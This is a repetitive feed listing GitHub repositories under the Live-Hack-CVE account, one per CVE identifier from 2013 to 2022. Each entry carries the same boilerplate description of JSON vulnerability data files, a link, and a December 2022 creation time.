**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6560 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6560](https://github.com/Live-Hack-CVE/CVE-2020-6560) create time: 2022-12-24T20:02:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10580 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10580](https://github.com/Live-Hack-CVE/CVE-2020-10580) create time: 2022-12-24T20:02:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25217 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25217](https://github.com/Live-Hack-CVE/CVE-2020-25217) create time: 2022-12-24T20:02:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25218 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25218](https://github.com/Live-Hack-CVE/CVE-2020-25218) create time: 2022-12-24T20:01:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11922 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11922](https://github.com/Live-Hack-CVE/CVE-2020-11922) create time: 2022-12-24T20:01:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11753 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11753](https://github.com/Live-Hack-CVE/CVE-2020-11753) create time: 2022-12-24T20:01:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11738 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11738](https://github.com/Live-Hack-CVE/CVE-2020-11738) create time: 2022-12-24T20:01:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11875 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11875](https://github.com/Live-Hack-CVE/CVE-2020-11875) create time: 2022-12-24T20:01:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-18127 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-18127](https://github.com/Live-Hack-CVE/CVE-2020-18127) create time: 2022-12-24T20:01:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20944 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20944](https://github.com/Live-Hack-CVE/CVE-2020-20944) create time: 2022-12-24T20:01:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19861 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19861](https://github.com/Live-Hack-CVE/CVE-2020-19861) create time: 2022-12-24T20:01:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-18731 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-18731](https://github.com/Live-Hack-CVE/CVE-2020-18731) create time: 2022-12-24T20:01:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-18730 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-18730](https://github.com/Live-Hack-CVE/CVE-2020-18730) create time: 2022-12-24T20:00:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6563 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6563](https://github.com/Live-Hack-CVE/CVE-2020-6563) create time: 2022-12-24T20:00:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29998 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29998](https://github.com/Live-Hack-CVE/CVE-2021-29998) create time: 2022-12-24T20:02:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40401 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40401](https://github.com/Live-Hack-CVE/CVE-2021-40401) create time: 2022-12-24T20:01:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21912 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21912](https://github.com/Live-Hack-CVE/CVE-2021-21912) create time: 2022-12-24T20:01:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4104 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4104](https://github.com/Live-Hack-CVE/CVE-2021-4104) create time: 2022-12-24T20:00:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37137 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37137](https://github.com/Live-Hack-CVE/CVE-2021-37137) create time: 2022-12-24T20:00:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42013 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42013](https://github.com/Live-Hack-CVE/CVE-2021-42013) create time: 2022-12-24T20:00:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38153 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38153](https://github.com/Live-Hack-CVE/CVE-2021-38153) create time: 2022-12-24T20:00:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3582 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3582](https://github.com/Live-Hack-CVE/CVE-2021-3582) create time: 2022-12-24T20:00:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4197 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4197](https://github.com/Live-Hack-CVE/CVE-2021-4197) create time: 2022-12-24T19:59:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43456 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43456](https://github.com/Live-Hack-CVE/CVE-2021-43456) create time: 2022-12-24T19:58:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43462 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43462](https://github.com/Live-Hack-CVE/CVE-2021-43462) create time: 2022-12-24T19:58:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40415 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40415](https://github.com/Live-Hack-CVE/CVE-2021-40415) create time: 2022-12-24T19:56:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4202 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4202](https://github.com/Live-Hack-CVE/CVE-2021-4202) create time: 2022-12-24T19:56:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44533 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44533](https://github.com/Live-Hack-CVE/CVE-2021-44533) create time: 2022-12-24T19:56:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20295 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20295](https://github.com/Live-Hack-CVE/CVE-2021-20295) create time: 2022-12-24T19:56:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45046 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45046](https://github.com/Live-Hack-CVE/CVE-2021-45046) create time: 2022-12-24T19:56:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38162 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38162](https://github.com/Live-Hack-CVE/CVE-2021-38162) create time: 2022-12-24T19:55:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40504 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40504](https://github.com/Live-Hack-CVE/CVE-2021-40504) create time: 2022-12-24T19:54:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44235 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44235](https://github.com/Live-Hack-CVE/CVE-2021-44235) create time: 2022-12-24T19:54:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27610 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27610](https://github.com/Live-Hack-CVE/CVE-2021-27610) create time: 2022-12-24T19:53:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33677 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33677](https://github.com/Live-Hack-CVE/CVE-2021-33677) create time: 2022-12-24T19:53:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40495 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40495](https://github.com/Live-Hack-CVE/CVE-2021-40495) create time: 2022-12-24T19:23:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38181 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38181](https://github.com/Live-Hack-CVE/CVE-2021-38181) create time: 2022-12-24T19:23:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40496 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40496](https://github.com/Live-Hack-CVE/CVE-2021-40496) create time: 2022-12-24T19:23:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38178 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38178](https://github.com/Live-Hack-CVE/CVE-2021-38178) create time: 2022-12-24T19:23:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42067 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42067](https://github.com/Live-Hack-CVE/CVE-2021-42067) create time: 2022-12-24T19:23:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4159 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4159](https://github.com/Live-Hack-CVE/CVE-2021-4159) create time: 2022-12-24T19:22:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3100 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3100](https://github.com/Live-Hack-CVE/CVE-2021-3100) create time: 2022-12-24T19:22:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3609 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3609](https://github.com/Live-Hack-CVE/CVE-2021-3609) create time: 2022-12-24T19:21:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40363 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40363](https://github.com/Live-Hack-CVE/CVE-2021-40363) create time: 2022-12-24T19:21:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34429 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34429](https://github.com/Live-Hack-CVE/CVE-2022-34429) create time: 2022-12-24T20:04:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34428 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34428](https://github.com/Live-Hack-CVE/CVE-2022-34428) create time: 2022-12-24T20:04:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39232 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39232](https://github.com/Live-Hack-CVE/CVE-2022-39232) create time: 2022-12-24T20:04:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40923 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40923](https://github.com/Live-Hack-CVE/CVE-2022-40923) create time: 2022-12-24T20:03:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40756 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40756](https://github.com/Live-Hack-CVE/CVE-2022-40756) create time: 2022-12-24T20:03:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40341 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40341](https://github.com/Live-Hack-CVE/CVE-2022-40341) create time: 2022-12-24T20:03:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35156 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35156](https://github.com/Live-Hack-CVE/CVE-2022-35156) create time: 2022-12-24T20:03:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35155 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35155](https://github.com/Live-Hack-CVE/CVE-2022-35155) create time: 2022-12-24T20:03:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20945 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20945](https://github.com/Live-Hack-CVE/CVE-2022-20945) create time: 2022-12-24T20:03:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29110 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29110](https://github.com/Live-Hack-CVE/CVE-2022-29110) create time: 2022-12-24T20:03:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20930 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20930](https://github.com/Live-Hack-CVE/CVE-2022-20930) create time: 2022-12-24T20:03:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20850 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20850](https://github.com/Live-Hack-CVE/CVE-2022-20850) create time: 2022-12-24T20:03:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20847 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20847](https://github.com/Live-Hack-CVE/CVE-2022-20847) create time: 2022-12-24T20:03:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29109 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29109](https://github.com/Live-Hack-CVE/CVE-2022-29109) create time: 2022-12-24T20:02:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20844 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20844](https://github.com/Live-Hack-CVE/CVE-2022-20844) create time: 2022-12-24T20:02:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2351 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2351](https://github.com/Live-Hack-CVE/CVE-2022-2351) create time: 2022-12-24T20:01:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0283 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0283](https://github.com/Live-Hack-CVE/CVE-2022-0283) create time: 2022-12-24T20:01:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2352 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2352](https://github.com/Live-Hack-CVE/CVE-2022-2352) create time: 2022-12-24T20:01:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22971 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22971](https://github.com/Live-Hack-CVE/CVE-2022-22971) create time: 2022-12-24T20:01:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40764 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40764](https://github.com/Live-Hack-CVE/CVE-2022-40764) create time: 2022-12-24T20:01:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24675 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24675](https://github.com/Live-Hack-CVE/CVE-2022-24675) create time: 2022-12-24T20:00:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33887 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33887](https://github.com/Live-Hack-CVE/CVE-2022-33887) create time: 2022-12-24T19:59:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33886 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33886](https://github.com/Live-Hack-CVE/CVE-2022-33886) create time: 2022-12-24T19:59:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33885 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33885](https://github.com/Live-Hack-CVE/CVE-2022-33885) create time: 2022-12-24T19:59:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33888 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33888](https://github.com/Live-Hack-CVE/CVE-2022-33888) create time: 2022-12-24T19:59:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29869 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29869](https://github.com/Live-Hack-CVE/CVE-2022-29869) create time: 2022-12-24T19:58:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27239 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27239](https://github.com/Live-Hack-CVE/CVE-2022-27239) create time: 2022-12-24T19:58:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29536 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29536](https://github.com/Live-Hack-CVE/CVE-2022-29536) create time: 2022-12-24T19:58:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0998 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0998](https://github.com/Live-Hack-CVE/CVE-2022-0998) create time: 2022-12-24T19:58:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25314 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25314](https://github.com/Live-Hack-CVE/CVE-2022-25314) create time: 2022-12-24T19:56:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-7488 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-7488](https://github.com/Live-Hack-CVE/CVE-2013-7488) create time: 2022-12-24T18:35:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4508 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4508](https://github.com/Live-Hack-CVE/CVE-2016-4508) create time: 2022-12-24T19:14:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4507 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4507](https://github.com/Live-Hack-CVE/CVE-2016-4507) create time: 2022-12-24T19:12:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-11655 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-11655](https://github.com/Live-Hack-CVE/CVE-2017-11655) create time: 2022-12-24T19:14:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-11654 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-11654](https://github.com/Live-Hack-CVE/CVE-2017-11654) create time: 2022-12-24T19:14:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10388 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10388](https://github.com/Live-Hack-CVE/CVE-2017-10388) create time: 2022-12-24T19:13:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10357 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10357](https://github.com/Live-Hack-CVE/CVE-2017-10357) create time: 2022-12-24T19:13:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10356 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10356](https://github.com/Live-Hack-CVE/CVE-2017-10356) create time: 2022-12-24T19:13:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10355 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10355](https://github.com/Live-Hack-CVE/CVE-2017-10355) create time: 2022-12-24T19:13:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10350 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10350](https://github.com/Live-Hack-CVE/CVE-2017-10350) create time: 2022-12-24T19:13:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10243 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10243](https://github.com/Live-Hack-CVE/CVE-2017-10243) create time: 2022-12-24T19:13:17Z

